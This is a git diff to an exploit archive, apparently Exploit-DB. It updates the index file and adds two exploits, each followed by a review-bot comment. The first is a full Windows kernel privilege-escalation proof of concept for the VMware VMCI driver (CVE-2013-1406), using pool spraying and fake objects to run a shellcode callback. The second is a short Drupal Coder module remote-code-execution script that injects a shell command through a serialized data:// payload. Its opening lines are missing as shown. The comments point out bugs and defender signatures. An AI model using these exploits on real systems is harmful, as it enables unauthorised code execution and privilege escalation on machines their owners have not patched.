diff --git a/files.csv b/files.csv
index e34d6f354..8b36d3fd7 100755
--- a/files.csv
+++ b/files.csv
@@ -21617,7 +21617,7 @@ id,file,description,date,author,platform,type,port
 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0
 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0
 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0
-24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0
+24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0
 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0
 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0
 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0
@@ -21640,7 +21640,7 @@ id,file,description,date,author,platform,type,port
 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
 24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
-24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0
+24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0
 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0
 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0
 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
@@ -25037,7 +25037,7 @@ id,file,description,date,author,platform,type,port
 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0
 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0
 28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0
-27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
+27938,platforms/linux/local/27938.rb,"VMware - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0
 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0
 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0
@@ -36305,6 +36305,7 @@ id,file,description,date,author,platform,type,port
 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
+40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0
 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
 40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
@@ -36322,10 +36323,11 @@ id,file,description,date,author,platform,type,port
 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
 40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
+40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept",2013-03-06,"Artem Shishkin",multiple,local,0
 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23
-40169,platforms/linux/local/40169.txt,"VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0
+40169,platforms/linux/local/40169.txt,"VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0
 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
@@ -36349,7 +36351,7 @@ id,file,description,date,author,platform,type,port
 40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
 40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
-40201,platforms/linux/remote/40201.txt,"ntop 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
+40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
 40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80
@@ -36361,6 +36363,6 @@ id,file,description,date,author,platform,type,port
 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80
 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
-40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
+40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
diff --git a/platforms/multiple/local/40164.c b/platforms/multiple/local/40164.c
new file mode 100755
index 000000000..7eeccee41
--- /dev/null
+++ b/platforms/multiple/local/40164.c
@@ -0,0 +1,472 @@ +/* + CVE-2013-1406 exploitation PoC + by Artem Shishkin, + Positive Research, + Positive Technologies, + 02-2013 +*/ + +void __stdcall FireShell(DWORD dwSomeParam) +{ + EscalatePrivileges(hProcessToElevate); + // Equate the stack and quit the cycle +#ifndef _AMD64_ + __asm + { + pop ebx + pop edi + push 0xFFFFFFF8 + push 0xA010043 + } +#endif +} + + +HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0) +{ + HANDLE hResult = 0; + DWORD dwLookupProcessID = dwProcessID; + + if (pHandleTable == NULL) + { + printf("Ain't funny\n"); + return 0; + } + + if (dwLookupProcessID == 0) + { + dwLookupProcessID = GetCurrentProcessId(); + } + + for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) + { + if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr)) + { + hResult = pHandleTable->Handles[i].HandleValue; + break; + } + } + + return hResult; +} + +PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) +{ + PVOID pResult = 0; + DWORD dwLookupProcessID = dwProcessID; + + if (pHandleTable == NULL) + { + printf("Ain't funny\n"); + return 0; + } + + if (dwLookupProcessID == 0) + { + dwLookupProcessID = GetCurrentProcessId(); + } + + for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) + { + if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) + { + pResult = (HANDLE)pHandleTable->Handles[i].Object; + break; + } + } + + return pResult; +} + +void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) +{ + DWORD dwLookupProcessID = dwProcessID; + + if (pHandleTable == NULL) + { + printf("Ain't funny\n"); + return; + } + + if (dwLookupProcessID == 0) + { + dwLookupProcessID = GetCurrentProcessId(); + } + + for (unsigned int i = 0; i < 
pHandleTable->NumberOfHandles; i++) + { + if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) + { + pHandleTable->Handles[i].Object = NULL; + pHandleTable->Handles[i].HandleValue = NULL; + break; + } + } + + return; +} + +void PoolSpray() +{ + // Init used native API function + lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation"); + if (NtQuerySystemInformation == NULL) + { + printf("Such a fail...\n"); + return; + } + + // Determine object size + // xp: + //const DWORD_PTR dwSemaphoreSize = 0x38; + // 7: + //const DWORD_PTR dwSemaphoreSize = 0x48; + + DWORD_PTR dwSemaphoreSize = 0; + + if (LOBYTE(GetVersion()) == 5) + { + dwSemaphoreSize = 0x38; + } + else if (LOBYTE(GetVersion()) == 6) + { + dwSemaphoreSize = 0x48; + } + + unsigned int cycleCount = 0; + while (cycleCount < 50000) + { + HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL); + if (hTemp == NULL) + { + break; + } + + ++cycleCount; + } + + printf("\t[+] Spawned lots of semaphores\n"); + + printf("\t[.] 
Initing pool windows\n"); + Sleep(2000); + + DWORD dwNeeded = 4096; + NTSTATUS status = 0xFFFFFFFF; + PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); + + while (true) + { + status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL); + if (status != STATUS_SUCCESS) + { + dwNeeded *= 2; + VirtualFree(pBuf, 0, MEM_RELEASE); + pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE); + } + else + { + break; + } + }; + + HANDLE hHandlesToClose[0x30] = {0}; + DWORD dwCurPID = GetCurrentProcessId(); + PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf; + + for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) + { + if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) + { + DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object; + DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue; + DWORD_PTR dwWindowAddress = 0; + bool bPoolWindowFound = false; + + UINT iObjectsNeeded = 0; + // Needed window size is vmci packet pool chunk size (0x218) divided by + // Semaphore pool chunk size (dwSemaphoreSize) + iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 
1 : 0); + + if ( + // Not on a page boundary + ((dwTestObjAddr & 0xFFF) != 0) + && + // Doesn't cross page boundary + (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) + ) + { + // Check previous object for being our semaphore + DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize; + if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) + { + continue; + } + + for (unsigned int j = 1; j < iObjectsNeeded; j++) + { + DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize); + HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr); + + //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal); + //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr); + //printf("\tLooked up handle = %08X\n", hLookedUp); + + if (hLookedUp != NULL) + { + hHandlesToClose[j] = hLookedUp; + + if (j == iObjectsNeeded - 1) + { + // Now test the following object + dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize); + if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) + { + hHandlesToClose[0] = (HANDLE)dwTestHandleVal; + bPoolWindowFound = true; + + dwWindowAddress = dwTestObjAddr; + + // Close handles to create a memory window + for (int k = 0; k < iObjectsNeeded; k++) + { + if (hHandlesToClose[k] != NULL) + { + CloseHandle(hHandlesToClose[k]); + CloseTableHandle(pHandleTable, hHandlesToClose[k]); + } + } + } + else + { + memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); + break; + } + } + } + else + { + memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); + break; + } + } + + if (bPoolWindowFound) + { + printf("\t[+] Window found at %08X!\n", dwWindowAddress); + } + + } + } + } + + VirtualFree(pBuf, 0, MEM_RELEASE); + + return; +} + +void InitFakeBuf(PVOID pBuf, DWORD dwSize) +{ + if (pBuf != NULL) + { + RtlFillMemory(pBuf, dwSize, 0x11); + } + + return; +} + +void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep) +{ + /* + Previous chunk size will be always 0x43 
and the pool index will be 0, so the last bytes will be 0x0043 + So, for every 0xXXXX0043 address we must suffice the following conditions: + + lea edx, [eax+38h] + lock xadd [edx], ecx + cmp ecx, 1 + + Some sort of lock at [addr + 38] must be equal to 1. And + + call dword ptr [eax+0ACh] + + The call site is located at [addr + 0xAC] + + Also fake the object to be dereferenced at [addr + 0x100] + */ + + if (pBuf != NULL) + { + for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) + { + PDWORD pLock = (PDWORD)(iAddr + 0x38); + PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC); + PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100); + + *pLock = 1; + *pCallMeMayBe = (DWORD_PTR)FireShell; + *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000; + } + } + + return; +} + +void PenetrateVMCI() +{ + /* + + VMware Security Advisory + Advisory ID: VMSA-2013-0002 + Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability + Issue date: 2013-02-07 + Updated on: 2013-02-07 (initial advisory) + CVE numbers: CVE-2013-1406 + + */ + + DWORD dwPidToElevate = 0; + HANDLE hSuspThread = NULL; + + bool bXP = (LOBYTE(GetVersion()) == 5); + bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1)); + bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2)); + + if (!InitKernelFuncs()) + { + printf("[-] Like I don't know where the shellcode functions are\n"); + return; + } + + if (bXP) + { + printf("[?] 
Who do we want to elevate?\n"); + scanf_s("%d", &dwPidToElevate); + + hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate); + if (hProcessToElevate == NULL) + { + printf("[-] This process doesn't want to be elevated\n"); + return; + } + } + + if (b7 || b8) + { + // We are unable to change an active process token on-the-fly, + // so we create a custom shell suspended (Ionescu hack) + STARTUPINFO si = {0}; + PROCESS_INFORMATION pi = {0}; + + si.wShowWindow = TRUE; + + WCHAR cmdPath[MAX_PATH] = {0}; + GetSystemDirectory(cmdPath, MAX_PATH); + wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe"); + + if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE) + { + hProcessToElevate = pi.hProcess; + hSuspThread = pi.hThread; + } + } + + HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); + if (hVMCIDevice != INVALID_HANDLE_VALUE) + { + UCHAR BadBuff[0x624] = {0}; + UCHAR retBuf[0x624] = {0}; + DWORD dwRet = 0; + + printf("[+] VMCI service found running\n"); + + PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff; + pVmReq->Header.RequestSize = 0xFFFFFFF0; + + PVOID pShellSprayBufStd = NULL; + PVOID pShellSprayBufQtd = NULL; + PVOID pShellSprayBufStd7 = NULL; + PVOID pShellSprayBufQtd7 = NULL; + PVOID pShellSprayBufChk8 = NULL; + + if ((b7) || (bXP) || (b8)) + { + /* + Significant bits of a PoolType of a chunk define the following regions: + 0x0A000000 - 0x0BFFFFFF - Standard chunk + 0x1A000000 - 0x1BFFFFFF - Quoted chunk + 0x0 - 0xFFFFFFFF - Free chunk - no idea + + Addon for Windows 7: + Since PoolType flags have changed, and "In use flag" is now 0x2, + define an additional region for Win7: + + 0x04000000 - 0x06000000 - Standard chunk + 0x14000000 - 0x16000000 - Quoted chunk + */ + + pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + 
pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL)) + { + printf("\t[-] Unable to map the needed memory regions, please try running the app again\n"); + CloseHandle(hVMCIDevice); + return; + } + + InitFakeBuf(pShellSprayBufStd, 0x2000000); + InitFakeBuf(pShellSprayBufQtd, 0x2000000); + InitFakeBuf(pShellSprayBufStd7, 0x2000000); + InitFakeBuf(pShellSprayBufQtd7, 0x2000000); + + PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000); + PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000); + PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000); + PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000); + + if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) + { + SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST); + } + + PoolSpray(); + + if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) + { + printf("\t[!] If you don't see any BSOD, you're successful\n"); + + if (b7 || b8) + { + ResumeThread(hSuspThread); + } + } + else + { + printf("[-] Not this time %d\n", GetLastError()); + } + + if (pShellSprayBufStd != NULL) + { + VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE); + } + + if (pShellSprayBufQtd != NULL) + { + VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE); + } + } + + SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL); + + CloseHandle(hVMCIDevice); + } + else + { + printf("[-] Like I don't see vmware here\n"); + } + + CloseHandle(hProcessToElevate); + + return; +} \ No newline at end of file 
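Review bot: The allocation check in PenetrateVMCI reads `if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL))`, testing the same pointer four times, so a failed `VirtualAlloc` for `pShellSprayBufStd`, `pShellSprayBufStd7` or `pShellSprayBufQtd7` is silently accepted and the NULL guards inside `InitFakeBuf`/`PlaceFakeObjects` merely skip that region. The same function releases only the two non-`7` buffers, never closes `hSuspThread` (the `pi.hThread` from `CreateProcess`), and declares `pShellSprayBufChk8` without using it. The file is committed as `.c` but relies on C++ default arguments (`DWORD dwProcessID = 0`) and `bool`/`true`, so it only builds as C++. For an archived proof of concept the change I would actually ask for is documentation: the header comment names only `CVE-2013-1406`, and it should also carry the advisory already quoted inside `PenetrateVMCI` (`VMSA-2013-0002`), state that the code selects XP/7/8 via `GetVersion()` and hard-coded pool chunk sizes, and say that on an unpatched host the observable outcome is a BSOD or elevation of the chosen process, so that the index entry can be triaged as "patched by the vendor advisory, no mitigation beyond updating vmci.sys".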
diff --git a/platforms/php/remote/40144.php b/platforms/php/remote/40144.php
new file mode 100755
index 000000000..9c16df529
--- /dev/null
+++ b/platforms/php/remote/40144.php
@@ -0,0 +1,29 @@
+ array(
+ "coder_upgrade" => array(
+ "module" => "color",
+ "files" => array("color.module")
+ )
+ ),
+ "extensions" => array("module"),
+ "items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")),
+ "paths" => array(
+ "modules_base" => "../../../",
+ "files_base" => "../../../../sites/default/files"
+ )
+);
+$payload = serialize($a);
+file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload));
+
+?>
\ No newline at end of file
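Review bot: The hunk as rendered begins at ` array(` with no `<?php`, `$host` or `$cmd` assignment, yet both variables are used on the `items` and `file_get_contents` lines and the header counts 29 added lines; most likely the renderer swallowed everything from `<?php` up to the first `=>` as a tag, so the opening lines should be read from the raw file rather than this view. The script carries no comment saying what it demonstrates; I would add a header stating that `coder_upgrade.run.php` accepts a `file=` parameter with a `data://` wrapper, unserializes the supplied array, and (presumably — the server side is not shown here) passes `old_dir` to a shell, which is why `"test; $cmd;"` is the payload, with the fixed versions 7.x-1.3 / 7.x-2.6 and advisory SA-CONTRIB-2016-039 copied from the index entry. For defenders the visible signature is a request to `/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php` whose `file` parameter begins with `data:`, and the remediation is updating the module to the versions named in the index.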